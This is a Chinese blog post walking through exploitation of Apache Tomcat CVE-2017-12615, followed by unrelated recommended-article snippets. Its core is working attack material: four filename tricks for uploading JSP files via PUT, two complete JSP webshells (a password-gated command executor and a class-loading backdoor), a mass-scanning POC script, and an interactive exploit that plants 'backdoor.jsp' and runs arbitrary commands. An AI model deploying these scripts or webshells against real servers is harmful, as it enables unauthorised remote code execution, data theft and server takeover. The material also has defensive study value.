tomcat7.x远程命令执行(CVE-2017-12615)漏洞利用复现

于 2022-01-11 15:33:34 发布
阅读量4.4k 收藏 7
点赞数 1
文章标签: tomcat
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_58606546/article/details/122433993
版权

一、漏洞前言

2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,该漏洞受影响版本为7.0-7.80之间,在一定条件下,攻击者可以利用这两个漏洞,获取用户服务器上 JSP 文件的源代码,或是通过精心构造的攻击请求,向用户服务器上传恶意JSP文件,通过上传的 JSP 文件 ,可在用户服务器上执行任意代码,从而导致数据泄露或获取服务器权限,存在高安全风险

二、漏洞名称

CVE-2017-12615-远程代码执行漏洞

三、危害等级:

高危

四、漏洞描述:

CVE-2017-12616:信息泄露漏洞
当 Tomcat 中使用了 VirtualDirContext 时,攻击者将能通过发送精心构造的恶意请求,绕过设置的相关安全限制,或是获取到由 VirtualDirContext 提供支持资源的 JSP 源代码。
CVE-2017-12615:远程代码执行漏洞
当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。
通过以上两个漏洞可在用户服务器上执行任意代码,从而导致数据泄露或获取服务器权限,存在高安全风险。

五、漏洞利用条件和方式
CVE-2017-12615漏洞利用需要在Windows环境,且需要将 readonly 初始化参数由默认值设置为 false,经过实际测试,Tomcat 7.x版本内web.xml配置文件内默认配置无readonly参数,需要手工添加,默认配置条件下不受此漏洞影响。

CVE-2017-12616漏洞需要在server.xml文件配置参数,经过实际测试,Tomcat 7.x版本内默认配置无VirtualDirContext参数,需要手工添加,默认配置条件下不受此漏洞影响。

六、漏洞影响范围:

CVE-2017-12616影响范围:Apache Tomcat 7.0.0 - 7.0.80
CVE-2017-12615影响范围: Apache Tomcat 7.0.0 - 7.0.7

七、漏洞复现

利用:PUT方法请求

burp suite抓包然后将请求头修改为
第一种利用:/

第二种后缀加个.
因为环境可能是linux的 所以可能不支持

第三种 NTFS流

这种方式之所以可行是因为利用了Windows环境下NTFS文件格式的特性,NTFS文件格式存在如下的性质,为此同样可以使tomcat认为其不是jsp文件从而交由DefaultServlet处理。这种利用方式适用与Windows系统+Tomcat 7.x。

第四种 %20

这种方式适合之所以可以成功创建jsp文件是因为Windows下不允许文件名以空格结尾,但是尾部添加空格可以使tomcat认为其不是jsp文件从而交由DefaultServlet处理。这种利用方式适用与Windows系统+Tomcat 7.x。

上传一个回显cmd马,进行访问

<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>

在repter模块对提交的数据进行更改,上传jsp一句话木马,密码passwd

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

POC

#CVE-2017-12615 POC
__author__ = '纸机'
import requests
import optparse
import os

parse = optparse.OptionParser(usage = 'python3 %prog [-h] [-u URL] [-p PORT] [-f FILE]')
parse.add_option('-u','--url',dest='URL',help='target url')
parse.add_option('-p','--port',dest='PORT',help='target port[default:8080]',default='8080')
parse.add_option('-f',dest='FILE',help='target list')

options,args = parse.parse_args()
#print(options)
#验证参数是否完整
if (not options.URL or not options.PORT) and not options.FILE:
        print('Usage:python3 CVE-2017-12615-POC.py [-u url] [-p port] [-f FILE]\n')
        exit('CVE-2017-12615-POC.py:error:missing a mandatory option(-u,-p).Use -h for basic and -hh for advanced help')

filename = '/hello.jsp'

#测试数据
data = 'hello'

#提交PUT请求
#resp = requests.post(url1,headers=headers,data=data)

#验证文件是否上传成功
#response = requests.get(url2)
#上传文件
def upload(url):
  try:
    response = requests.put(url+filename+'/',data=data)
    return 1
  except Exception as e:
    print("[-] {0} 连接失败".format(url))
    return 0
def checking(url):
  try:
    #验证文件是否上传成功
    response = requests.get(url+filename)
    #print(url+filename)
    if response.status_code == 200 and 'hello' in response.text:
      print('[+] {0} 存在CVE-2017-12615 Tomcat 任意文件读写漏洞'.format(url))
    else:
      print('[-] {0} 不存在CVE-2017-12615 Tomcat 任意文件读写漏洞'.format(url))
  except Exception as e:
                #print(e)
    print("[-] {0} 连接失败".format(url))
if options.FILE and os.path.exists(options.FILE):
  with open(options.FILE) as f:
    urls = f.readlines()
    #print(urls)
    for url in urls:
      url = str(url).replace('\n', '').replace('\r', '').strip()
      if upload(url) == 1:
        checking(url)
elif options.FILE and not os.path.exists(options.FILE):
  print('[-] {0} 文件不存在'.format(options.FILE))
else:
  #上传链接
  url = options.URL+':'+options.PORT
  if upload(url) == 1:
    checking(url)

EXP

#CVE-2017-12615 EXP
__author__ = '纸机'
import requests
import optparse
import time


parse = optparse.OptionParser(usage = 'python3 %prog [-h] [-u URL] [-p PORT]')
parse.add_option('-u','--url',dest='URL',help='target url')
parse.add_option('-p','--port',dest='PORT',help='target port[default:8080]',default='8080')

options,args = parse.parse_args()
#验证参数是否完整
if not options.URL or not options.PORT:
        print('Usage:python3 CVE-2017-12615-POC.py [-u url] [-p port]\n')
        exit('CVE-2017-12615-POC.py:error:missing a mandatory option(-u,-p).Use -h for basic and -hh for advanced help')

url = options.URL+':'+options.PORT
filename = '/backdoor.jsp'
payload = filename+'?pwd=023&i='

headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0"}
#木马
data = '''<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }

%>'''
#上传木马文件
def upload(url):
  print('[*] 目标地址:'+url)
  try:
    respond = requests.put(url+filename+'/',headers=headers,data = data)
    #print(respond.status_code)
    if respond.status_code == 201 or respond.status_code == 204:
      #print('[*] 目标地址:'+url)
      print('[+] 木马上传成功')
  except Exception as e:
    print('[-] 上传失败')
    return 0

#命令执行
def attack(url,cmd):
  try:
    respond = requests.get(url+payload+cmd)
    if respond.status_code == 200:
      print(str(respond.text).replace("<pre>","").replace("</pre>","").strip())

  except Exception as e:
    print('[-] 命令执行错误')
if upload(url) == 0:
        exit()
time.sleep(0.5)
print('输入执行命令(quit退出):')
while(1):
  cmd = input('>>>')
  if(cmd == 'quit'):
    break
  attack(url,cmd)

一年一更
关注
产品学习:智能生产调度管理系统
blog_优快云_xutingzhou
11-19 3372
智能生产调度管理系统以生产计划为依据,基于生产过程的实时工艺信息和设备运行状态信息,提供包括计划执行与修正、资源合理利用、产量与质量统计分析、平稳工况的优化调度、异常工况的动态调度、辅助生产调度决策等功能的一体化解决方案,做到“实时监控、平衡协调、动态调度、资源优化”,降低生产成本、提高劳动生产率,为企业的生产组织和管理工作带来全面提升,增添新的价值。
The World Web
05-25
本人用过的最好的浏览器。轻快、简洁、功能强是它给我的感觉!!
Programming the world wide web
05-13
Programming the world wide web 第8版
HTTP: World Wide Web
menuconfig的专栏
07-26 1823
下载第32章HTTP: World Wide Web作者:Neal S. Jamison本章内容包括:• 万维网( World Wide We b )• 统一资源定位器( U R L )• We b服务器与浏览器• 理解H T T P• 高级主题• We b语言• We b的未来万维网被称为1 9 9 0年至今最引人注目的应用。没有什么技术或工具像它一样被广泛应用。We b的增长现象是互联网技术重
1.2 World Wide Web —— Web是Internet的一部分(HTTP部分)
amnesiagreen的博客
05-15 554
文章目录1. Web网络(Web)2. 网页(Webpage)3. 网站(Website)4. 在浏览器中打开网页5. 总结 源网页:https://marksheet.io/web.html 1. Web网络(Web) 我们看到在互联网上连接的计算机是如何用不同的语言进行通信的,称为协议,以交换电子邮件、文件、聊天信息… 这些协议中的一种叫做HTTP。它是计算机之间相互共享网页 Webpages 的协议,就像你目前正在阅读的就遵循这个协议。 Web是互联网中共享网页的部分。如果URL以https://开头
Programming the World Wide Web
11-22
《编程世界万维网》第六版由罗伯特·W·塞贝斯塔撰写,该书主要探讨了如何通过编程技术来构建和管理互联网上的应用程序,尤其是针对万维网(World Wide Web, WWW)这一领域。本书是对于互联网编程感兴趣的学习者、...
万维网上的CGI编程CGI Programming on the World Wide Web
11-15
处理完成后,这些程序再将响应结果返回给Web服务器,由Web服务器将结果转发给客户端浏览器。这种方式为动态网页的创建提供了强大的支持。 #### 二、CGI的历史与发展 CGI最初是在1993年由NCSA(National Center for...
Exploring-Wide-Scrape:我使用 80TB Wide Scrape of the World Wide Web 工作的代码,由 Internet Archive 提供
06-06
我使用 80TB Wide Scrape of the World Wide Web 工作的代码,由 Internet Archive 提供。 欲了解更多信息,请关注我的博客。 代码是用 Mathematica 8 或 9 编写的。 CDX 文件的域计数 (CDX-Analysis.nb) :参见 ...
PHP for the World Wide Web: Visual QuickStart Guide(chm)
10-09
《PHP for the World Wide Web: Visual QuickStart Guide》是一本专为初学者和中级开发者设计的PHP编程指南,旨在帮助读者快速掌握PHP语言并应用于Web开发。这本书采用图文并茂的方式,使学习过程更为直观易懂。以下...
计算机网络(41)—— 万维网和HTTP协议
weixin_45418001的博客
05-28 774
万维网和HTTP协议 万维网www(World Wide Web)是一个大规模的、联机式的信息储藏所/资料空间,是无数个网络战点和网页的集合。 统一资源定位符URL URL一般形式: 用户通过点击超链接(http://www.baidu.com)获取资源,这些资源通过超文本传输协议(HTTP)传送给使用者。 万维网以客户/服务器方式工作,用户使用的浏览器就是万维网客户程序,万维网文档所驻留的主机运行服务器程序。 万维网使用超文本标记语言HTML,使得万维网页面设计者可以很方便地从一个界面的链接转到另一个界
计算机网络(8)——Web应用:HTTP协议
W24的博客
01-26 503
文章目录HTTP 连接类型非持久性连接持久性连接HTTP 报文格式HTTP 请求报文HTTP 响应报文 Web(World Wide Web)即全球广域网,也称为万维网,它是一种基于超文本和 HTTP 的、全球性的、动态交互的、跨平台的分布式图形信息系统。 Web 页面(Web page)是由对象组成的。一个对象(object)只是一个文件,如 HTML 文件、一个 JPEG 图形、一个 Java 小程序或一个视频文件等;多数 Web 页面含有一个 HTML 基本文件,它通过对象的 URL 地址引用页面中的
计算机英语第二版第十章,《计算机专业英语》第10章在线测试.doc
weixin_29609679的博客
06-22 518
《计算机专业英语》第10章在线测试?《计算机专业英语》第10章在线测试剩余时间:59:56窗体顶端?答题须知:1、本卷满分20分。?????????? 2、答完题后,请一定要单击下面的“交卷”按钮交卷,否则无法记录本试卷的成绩。?????????? 3、在交卷之前,不要刷新本网页,否则你的答题结果将会被清空。第一题、单项选择题(每题1分,5道题共5分)?1、The abbreviation HTT...
计算机英语教程第四版,计算机专业英语教程(第4版)全书译文
weixin_34238178的博客
06-17 1045
Pages that point to other pages are said to use hypertext.Hypertext 超文本指向其他一些页面的页面被称为使用超文本。Web pages can combine color desktop publishing, hypertext linking, interactive scripting, sound, video, and e...
WorldWideWeb浏览器
tyygming的专栏
06-02 404
日期:2013-6-2  来源:GBin1.com 最早的网络浏览器 - 浏览器编辑器 - 被叫做WorldWideWeb,即万维网。他是写于1990年,而他也是当时唯一的浏览网的途径。很久以后,为了区分程序和抽象信息空间(现在的拼写改 为了World Wide Web,在三个单词间加了空格)的概念,它才被改名为Nexus。 Tim当时是用NeXT电脑来编程的。它的 优 点是可以使用一些非常...
[LeetCode] 116&117. Populating Next Right Pointers in Each Node I&II_Medium tag: BFS(Dont know why ...
weixin_30763455的博客
07-13 84
Given a binary tree struct TreeLinkNode { TreeLinkNode *left; TreeLinkNode *right; TreeLinkNode *next; } Populate each next pointer to point to its next right node. If there is no next r...
07757计算机专业英语题吉林,吉大自考本 计算机专业英语(一)
weixin_39586353的博客
06-29 2385
吉大自考本 计算机专业英语(一)发布日期:2015-09-25 点击次数:1664内容提要:作者:吉大自考网 www.jdzkw.com.cn关键词:吉大自考 计算机应用软件报名方式:13620791345 许老师 0431-85690458计算机应用软件(本科) 专业代码:080762 主考学校:吉林大学计算机专业英语(一)(07757) 简单题1. How many layers does...
产品学习:基于云计算的智慧医疗
blog_优快云_xutingzhou
04-06 2155
智慧医疗是智慧城市的一个重要组成部分,是综合应用医疗物联网、数据融合传输交换、云计算、城域网等技术,通过信息技术将医疗基础设施与IT基础设施进行融合,以“医疗云数据中心”为核心,跨越原有医疗系统的时空限制,并在此基础上进行智能决策,实现医疗服务最优化的医疗体系。
学习 programming the world wide web
05-30
如果你想学习《Programming the World Wide Web》这本书,你需要具备一定的编程基础,尤其是 Web 开发相关的基础知识,包括 HTML、CSS、JavaScript、服务器端编程语言和数据库等方面的知识。如果你还没有这些基础,建议先学习这些知识再来学习这本书。 以下是一些学习这本书的建议: 1. 阅读书籍的前言和目录,了解书籍的主要内容和组织结构。 2. 通读整本书,了解 Web 开发的基础概念、技术和最佳实践。 3. 在学习每一章节时,先阅读章节的内容,然后运行书中的示例代码,理解代码的功能和实现方法。 4. 在学习过程中,可以结合其他资源,比如视频教程、在线课程和练习题等,加深对 Web 开发的理解和掌握。 5. 在学习过程中,不要只停留在理论层面,要不断地实践和思考,将书中的知识应用到实际项目中。 总之,学习《Programming the World Wide Web》需要耐心和实践,只有不断地练习和思考,才能真正掌握 Web 开发的技术和方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值